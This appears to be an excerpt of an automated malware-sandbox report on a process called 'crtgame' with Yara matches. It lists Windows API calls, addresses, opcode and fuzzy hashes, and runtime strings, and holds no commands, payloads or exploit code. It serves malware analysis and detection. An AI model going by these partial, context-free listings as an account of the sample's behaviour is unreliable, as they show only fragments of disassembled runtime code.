                                                                                      • Part of subcall function 02C518D0: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02C5112E,?,?), ref: 02C518FF
                                                                                      • Part of subcall function 02C518D0: CloseHandle.KERNEL32(00000000,?,?,02C5112E,?,?), ref: 02C51914
                                                                                      • Part of subcall function 02C518D0: SetEvent.KERNEL32(00000000,02C5112E,?,?), ref: 02C51927
                                                                                    • OpenEventA.KERNEL32(00100002,00000000,00000000), ref: 02C510B0
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C510C5
                                                                                    • ResetEvent.KERNEL32(00000000), ref: 02C510CF
                                                                                    • CloseHandle.KERNEL32(00000000,F0F7CB0E), ref: 02C51104
                                                                                    • __CxxThrowException@8.LIBCMT ref: 02C51135
                                                                                      • Part of subcall function 02C53F5A: RaiseException.KERNEL32(?,?,?,02C70F6C,?,00000400,?,?,?,02C5359C,?,02C70F6C,00000000,00000001), ref: 02C53FAF
                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,F0F7CB0E), ref: 02C5117A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C5118F
                                                                                      • Part of subcall function 02C51610: GetCurrentProcessId.KERNEL32(?), ref: 02C51669
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,F0F7CB0E), ref: 02C5119F
                                                                                    • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                                    • String ID:
                                                                                    • API String ID: 2227236058-0
                                                                                    APIs
                                                                                    • __init_pointers.LIBCMT ref: 02C55794
                                                                                      • Part of subcall function 02C57F02: RtlEncodePointer.NTDLL(00000000), ref: 02C57F05
                                                                                      • Part of subcall function 02C57F02: __initp_misc_winsig.LIBCMT ref: 02C57F20
                                                                                      • Part of subcall function 02C57F02: GetModuleHandleW.KERNEL32(kernel32.dll,?), ref: 02C58C81
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02C58C95
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02C58CA8
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02C58CBB
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02C58CCE
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02C58CE1
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02C58CF4
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02C58D07
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02C58D1A
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02C58D2D
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02C58D40
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02C58D53
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02C58D66
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02C58D79
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02C58D8C
                                                                                      • Part of subcall function 02C57F02: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02C58D9F
                                                                                    • __mtinitlocks.LIBCMT ref: 02C55799
                                                                                    • __mtterm.LIBCMT ref: 02C557A2
                                                                                      • Part of subcall function 02C5580A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02C5833A
                                                                                      • Part of subcall function 02C5580A: RtlDeleteCriticalSection.NTDLL(02C73978), ref: 02C58363
                                                                                    • __calloc_crt.LIBCMT ref: 02C557C7
                                                                                    • __initptd.LIBCMT ref: 02C557E9
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 02C557F0
                                                                                    • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                                                                    • String ID:
                                                                                    • API String ID: 1500305132-0
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,02C52E73,00000000), ref: 02C52EDB
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C52EE2
                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 02C52EEE
                                                                                    • RtlDecodePointer.NTDLL(00000001), ref: 02C52F0B
                                                                                    Strings
                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                    • String ID: RoInitialize$combase.dll
                                                                                    • API String ID: 3489934621-340411864
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02C52EB0), ref: 02C52FB0
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 02C52FB7
                                                                                    • RtlEncodePointer.NTDLL(00000000), ref: 02C52FC2
                                                                                    • RtlDecodePointer.NTDLL(02C52EB0), ref: 02C52FDD
                                                                                    Strings
                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                    • API String ID: 3489934621-2819208100
                                                                                    • Opcode ID: 298ef044d447d6685d7a4611aacfab12bf1e81dfc3e54c8a41bfa4fe882f246a
                                                                                    • Instruction ID: deb9e79b89d17e44744325aa2c6627cc98bb059a9bc4011092d319120792b562
                                                                                    • Opcode Fuzzy Hash: 298ef044d447d6685d7a4611aacfab12bf1e81dfc3e54c8a41bfa4fe882f246a
                                                                                    • Instruction Fuzzy Hash: 81E0B670DC4714ABFB505F61AD0DB247AADF744709F604F25F906D1094DBB9806CCB99
                                                                                    APIs
                                                                                    • TlsGetValue.KERNEL32(00000025,F0F7CB0E,?,?,?,?,00000000,02C664B8,000000FF,02C51BCA), ref: 02C5196A
                                                                                    • TlsSetValue.KERNEL32(00000025,02C51BCA,?,?,00000000), ref: 02C519D7
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C51A01
                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C51A04
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HeapValue$FreeProcess
                                                                                    • String ID:
                                                                                    • API String ID: 1812714009-0
                                                                                    • Opcode ID: dd40c60c1338066e1bd8837952fa118898621e373bb5b478163ea0697b1abc33
                                                                                    • Instruction ID: 8864d561da6152a6f8a2baaada2788f06f1c0c6bdb65e385555e20654a9ec74d
                                                                                    • Opcode Fuzzy Hash: dd40c60c1338066e1bd8837952fa118898621e373bb5b478163ea0697b1abc33
                                                                                    • Instruction Fuzzy Hash: 3851BF319443649FD721DF2AC44CB16BBE4EB85668F0D8A58F85D97280C7B0E984CBA5
                                                                                    APIs
                                                                                    • _ValidateScopeTableHandlers.LIBCMT ref: 02C65190
                                                                                    • __FindPESection.LIBCMT ref: 02C651AA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FindHandlersScopeSectionTableValidate
                                                                                    • String ID:
                                                                                    • API String ID: 876702719-0
                                                                                    • Opcode ID: 11fac636d73f15dec92009b2000b2ebf3339b171d219ee1cdda285297120a4d3
                                                                                    • Instruction ID: 2aed5664febf40e46a479a4a6080771327111c9c4e2f4c4d0155301ca2c81d55
                                                                                    • Opcode Fuzzy Hash: 11fac636d73f15dec92009b2000b2ebf3339b171d219ee1cdda285297120a4d3
                                                                                    • Instruction Fuzzy Hash: 22A1CD71A006198FCB24CF58D8C8BBDB7A5FB84794FA84669D805EB380E771E945CB90
                                                                                    APIs
                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C41CB1
                                                                                    • CloseHandle.KERNEL32(?), ref: 02C41CBA
                                                                                    • InterlockedExchangeAdd.KERNEL32(02C774EC,00000000), ref: 02C41CC6
                                                                                    • TerminateThread.KERNEL32(?,00000000), ref: 02C41CD4
                                                                                    • QueueUserAPC.KERNEL32(02C41E7C,?,00000000), ref: 02C41CE1
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C41CEC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                                    • String ID:
                                                                                    • API String ID: 1946104331-0
                                                                                    • Opcode ID: 902f89e3bb6892752834727ae116c973f87fd83b9c64019e518642a3bae8dcc4
                                                                                    • Instruction ID: 945ecd39d01abb5e9f94033f3a5dd17269457301c6ec15668f172782492abdef
                                                                                    • Opcode Fuzzy Hash: 902f89e3bb6892752834727ae116c973f87fd83b9c64019e518642a3bae8dcc4
                                                                                    • Instruction Fuzzy Hash: 89F0A435940214BFDB204B97DD0DD57FFBCEB857207004B59F56A82190DBB05954CBB0
                                                                                    APIs
                                                                                    • std::exception::exception.LIBCMT ref: 02C5137F
                                                                                      • Part of subcall function 02C51ED3: std::exception::_Copy_str.LIBCMT ref: 02C51EEC
                                                                                      • Part of subcall function 02C50750: __CxxThrowException@8.LIBCMT ref: 02C507AE
                                                                                    • std::exception::exception.LIBCMT ref: 02C513DE
                                                                                    Strings
                                                                                    • boost unique_lock owns already the mutex, xrefs: 02C513CD
                                                                                    • $, xrefs: 02C513E3
                                                                                    • boost unique_lock has no mutex, xrefs: 02C5136E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                                                    • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                                                    • API String ID: 2140441600-46888669
                                                                                    • Opcode ID: e0f86af192dec885d6ff793e661f42c67c531e256f38fc1a62c65d319172e4e0
                                                                                    • Instruction ID: 3420e5d22b2042ccf2ad89bbd00148f656d6745ceb60dfcd642d47fb76e397da
                                                                                    • Opcode Fuzzy Hash: e0f86af192dec885d6ff793e661f42c67c531e256f38fc1a62c65d319172e4e0
                                                                                    • Instruction Fuzzy Hash: 042106B15083909FD720DF24C54875BBBE9BB88B08F444E5DF8A587280D7B9D848DF96
                                                                                    APIs
                                                                                    • __getptd_noexit.LIBCMT ref: 02C54480
                                                                                      • Part of subcall function 02C55672: GetLastError.KERNEL32(?,02C53569,02C55860,02C52A33,00000400,?,02C53569,02C4F37C,?,?,02C4F37C,00000000), ref: 02C55674
                                                                                      • Part of subcall function 02C55672: __calloc_crt.LIBCMT ref: 02C55695
                                                                                      • Part of subcall function 02C55672: __initptd.LIBCMT ref: 02C556B7
                                                                                      • Part of subcall function 02C55672: GetCurrentThreadId.KERNEL32 ref: 02C556BE
                                                                                      • Part of subcall function 02C55672: SetLastError.KERNEL32(00000000,02C53569,02C4F37C,?,?,02C4F37C,00000000), ref: 02C556D6
                                                                                    • __calloc_crt.LIBCMT ref: 02C544A3
                                                                                    • __get_sys_err_msg.LIBCMT ref: 02C544C1
                                                                                    • __invoke_watson.LIBCMT ref: 02C544DE
                                                                                    Strings
                                                                                    • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02C5448B, 02C544B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                                                    • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                    • API String ID: 109275364-798102604
                                                                                    • Opcode ID: 3a9ccf1a902fd957dab5bd1e4d9a4cb90519659d7163cbdcd7700e624601f4df
                                                                                    • Instruction ID: b7b5710703940feaaeead67b96d43a9e4a05b73979c817c556a4e0442a078fa7
                                                                                    • Opcode Fuzzy Hash: 3a9ccf1a902fd957dab5bd1e4d9a4cb90519659d7163cbdcd7700e624601f4df
                                                                                    • Instruction Fuzzy Hash: 58F059729C0B346BEF39AD264C40A3B72CDEB807A0B008526FD45D7600EB25CDC0169D
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C42350
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C42360
                                                                                    • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C42370
                                                                                    • GetLastError.KERNEL32 ref: 02C4237A
                                                                                      • Part of subcall function 02C41712: __EH_prolog.LIBCMT ref: 02C41717
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                                                    • String ID: pqcs
                                                                                    • API String ID: 1619523792-2559862021
                                                                                    • Opcode ID: f6287969760ae2f7d94c4681b1d8a5ba3c323d4f478e2a357bfb4054ad6eb466
                                                                                    • Instruction ID: 087cbc7f226a3e44a2bd75b1d448156dd70da45f3dbb79be8d6282a586ce223c
                                                                                    • Opcode Fuzzy Hash: f6287969760ae2f7d94c4681b1d8a5ba3c323d4f478e2a357bfb4054ad6eb466
                                                                                    • Instruction Fuzzy Hash: 67F03670A403046FD7206F75990DB6B77BCDB45605B000955F949D2140EB71D6549BE1
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C44035
                                                                                    • GetProcessHeap.KERNEL32(00000000,02C4A5C3,?,?,?,?,?,02C4A5C3), ref: 02C44042
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02C44049
                                                                                    • std::exception::exception.LIBCMT ref: 02C44063
                                                                                      • Part of subcall function 02C4A053: __EH_prolog.LIBCMT ref: 02C4A058
                                                                                      • Part of subcall function 02C4A053: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C4A067
                                                                                      • Part of subcall function 02C4A053: __CxxThrowException@8.LIBCMT ref: 02C4A086
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                                                    • String ID: bad allocation
                                                                                    • API String ID: 3112922283-2104205924
                                                                                    • Opcode ID: d3f287711efd63448bba06031e406a443d7b4662d24fd993b5a155aaf07727cf
                                                                                    • Instruction ID: 639758b295ed16d96812443436477ac426dde357e909ba4efaa2652cf0d71739
                                                                                    • Opcode Fuzzy Hash: d3f287711efd63448bba06031e406a443d7b4662d24fd993b5a155aaf07727cf
                                                                                    • Instruction Fuzzy Hash: 87F082B1E44209AFDB10EFE0D85CBFFBB78EB04344F404955E915A2240DB755218CF91
                                                                                    APIs
                                                                                      • Part of subcall function 02C51450: CloseHandle.KERNEL32(00000000,F0F7CB0E), ref: 02C514A1
                                                                                      • Part of subcall function 02C51450: WaitForSingleObject.KERNEL32(?,000000FF,F0F7CB0E,?,?,?,?,F0F7CB0E,02C51423,F0F7CB0E), ref: 02C514B8
                                                                                    • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C5171E
                                                                                    • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C5173E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C51777
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C517CB
                                                                                    • SetEvent.KERNEL32(?), ref: 02C517D2
                                                                                      • Part of subcall function 02C4418C: CloseHandle.KERNEL32(00000000,?,02C51705), ref: 02C441B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 4166353394-0
                                                                                    • Opcode ID: 09f7b643692f73a710f09a0c51e986347eef62250b6a408143c6d3a8a813d1c9
                                                                                    • Instruction ID: 024ea7938768160ac9d591905fb1eac6b42c39cd01033c22b0cdca6ca1f5b253
                                                                                    • Opcode Fuzzy Hash: 09f7b643692f73a710f09a0c51e986347eef62250b6a408143c6d3a8a813d1c9
                                                                                    • Instruction Fuzzy Hash: FB4127305003258FDB259F2ECC8872777E8EF85764F180668EC1CDB285D774D9858B99
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C420AC
                                                                                    • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C420CD
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C420D8
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 02C4213E
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C421A6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked$Exchange$DecrementTimerWaitable
                                                                                    • String ID:
                                                                                    • API String ID: 1611172436-0
                                                                                    • Opcode ID: 7bce803a3bab192aa64826a57065701b864f461c952634aaa7f98c11d1c5d51f
                                                                                    • Instruction ID: a2f55591fdc42f6613516b124d5814fc1c22f69b9b706c9d069da7ade8e62308
                                                                                    • Opcode Fuzzy Hash: 7bce803a3bab192aa64826a57065701b864f461c952634aaa7f98c11d1c5d51f
                                                                                    • Instruction Fuzzy Hash: 9B315C715047019FC311DF26D885A6BFBF9EFD8664F140A1EF89693650DB30E905CBA2
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4DA89
                                                                                      • Part of subcall function 02C41A01: TlsGetValue.KERNEL32 ref: 02C41A0A
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C4DB08
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C4DB24
                                                                                    • InterlockedIncrement.KERNEL32(02C75170), ref: 02C4DB49
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C4DB5E
                                                                                      • Part of subcall function 02C427F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02C4284E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                                                    • String ID:
                                                                                    • API String ID: 1578506061-0
                                                                                    • Opcode ID: ff7d70058fa1fcff56b2e83837803ec52fd6f4f4188284958445260b8c6a54db
                                                                                    • Instruction ID: 8a124df5aef72d1390aa8f9da2b43c5e60f0123a322f132b854a24d8c99e0720
                                                                                    • Opcode Fuzzy Hash: ff7d70058fa1fcff56b2e83837803ec52fd6f4f4188284958445260b8c6a54db
                                                                                    • Instruction Fuzzy Hash: 7C314AB1D013059FCB10DF65C444AAABBF8FF48314F14455EE849D7641EB74A604CFA0
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C421DA
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C421ED
                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02C42224
                                                                                    • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02C42237
                                                                                    • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02C42261
                                                                                      • Part of subcall function 02C42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C42350
                                                                                      • Part of subcall function 02C42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C42360
                                                                                      • Part of subcall function 02C42341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C42370
                                                                                      • Part of subcall function 02C42341: GetLastError.KERNEL32 ref: 02C4237A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1856819132-0
                                                                                    • Opcode ID: 91763e22e1f5c9e37f6a3e7c76f4575dbab528112a4fa1605ea47a349790c4e4
                                                                                    • Instruction ID: a95e767100734d968c7b2aebebb1801bf34332d4227cd5b3ac8f523d2f9c390a
                                                                                    • Opcode Fuzzy Hash: 91763e22e1f5c9e37f6a3e7c76f4575dbab528112a4fa1605ea47a349790c4e4
                                                                                    • Instruction Fuzzy Hash: B3115C72D542189BCB219FA5D8086AFFBBAFB44314F004A1AEC1592260DB718654DBD1
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 02C4229D
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C422B0
                                                                                    • TlsGetValue.KERNEL32 ref: 02C422E7
                                                                                    • TlsSetValue.KERNEL32(?), ref: 02C42300
                                                                                    • TlsSetValue.KERNEL32(?,?,?), ref: 02C4231C
                                                                                      • Part of subcall function 02C42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C42350
                                                                                      • Part of subcall function 02C42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02C42360
                                                                                      • Part of subcall function 02C42341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C42370
                                                                                      • Part of subcall function 02C42341: GetLastError.KERNEL32 ref: 02C4237A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 1856819132-0
                                                                                    • Opcode ID: f88add4f8440111c0e60c8810a4046600f23431c40859a82789a83e92f079731
                                                                                    • Instruction ID: fe655c2a6f240b747d468ae2c969179656bf3b94cf67cb6ec6d06746563b21fa
                                                                                    • Opcode Fuzzy Hash: f88add4f8440111c0e60c8810a4046600f23431c40859a82789a83e92f079731
                                                                                    • Instruction Fuzzy Hash: C9112B72D50219ABCB119FA5E8446AEFFBAFF48314F00496AE804E3250DB718A65DFD1
                                                                                    APIs
                                                                                      • Part of subcall function 02C4AAEE: __EH_prolog.LIBCMT ref: 02C4AAF3
                                                                                    • __CxxThrowException@8.LIBCMT ref: 02C4B6B8
                                                                                      • Part of subcall function 02C53F5A: RaiseException.KERNEL32(?,?,?,02C70F6C,?,00000400,?,?,?,02C5359C,?,02C70F6C,00000000,00000001), ref: 02C53FAF
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02C71DA4,?,00000001), ref: 02C4B6CE
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C4B6E1
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02C71DA4,?,00000001), ref: 02C4B6F1
                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C4B6FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                    • String ID:
                                                                                    • API String ID: 2725315915-0
                                                                                    • Opcode ID: 002187b2d838801bc269c70d288a36c76040ab86a59f11a082f006c58f688c46
                                                                                    • Instruction ID: 0c4499730f27e04340429b2d48a615b09b79d1f21201753ee4b92570da9130c1
                                                                                    • Opcode Fuzzy Hash: 002187b2d838801bc269c70d288a36c76040ab86a59f11a082f006c58f688c46
                                                                                    • Instruction Fuzzy Hash: A50181B2A40204BFDB10DBA5DC8DF97B7ADEB04759B004A55F615D7290DB61E8148B70
                                                                                    APIs
                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02C42432
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02C42445
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C42454
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C42469
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C42470
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 747265849-0
                                                                                    • Opcode ID: 48f7e54c4d1ee6aab88844267ab79995a012c05455510b3110072500af567c83
                                                                                    • Instruction ID: c17e189e97f1fd1f1805615af53b24da49938d408070616d2ad08b8a57f5715c
                                                                                    • Opcode Fuzzy Hash: 48f7e54c4d1ee6aab88844267ab79995a012c05455510b3110072500af567c83
                                                                                    • Instruction Fuzzy Hash: 0DF03072640204BFDA10ABA1ED8DFD7B72CFB44715F800951F701D6481DB61A628CBF1
                                                                                    APIs
                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 02C41ED2
                                                                                    • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02C41EEA
                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02C41EF9
                                                                                    • InterlockedExchange.KERNEL32(?,00000001), ref: 02C41F0E
                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02C41F15
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C41000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_2c41000_crtgame.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                    • String ID:
                                                                                    • API String ID: 830998967-0
                                                                                    • Opcode ID: 1f3889a0b3d44742d98002d179cf3eacea2901caa73d6dab8b17824c6f4243b5
                                                                                    • Instruction ID: 4f73ffdf3af4554c183820f6c2b3ba4fd79277c32fd4ab522c496265256e98ae
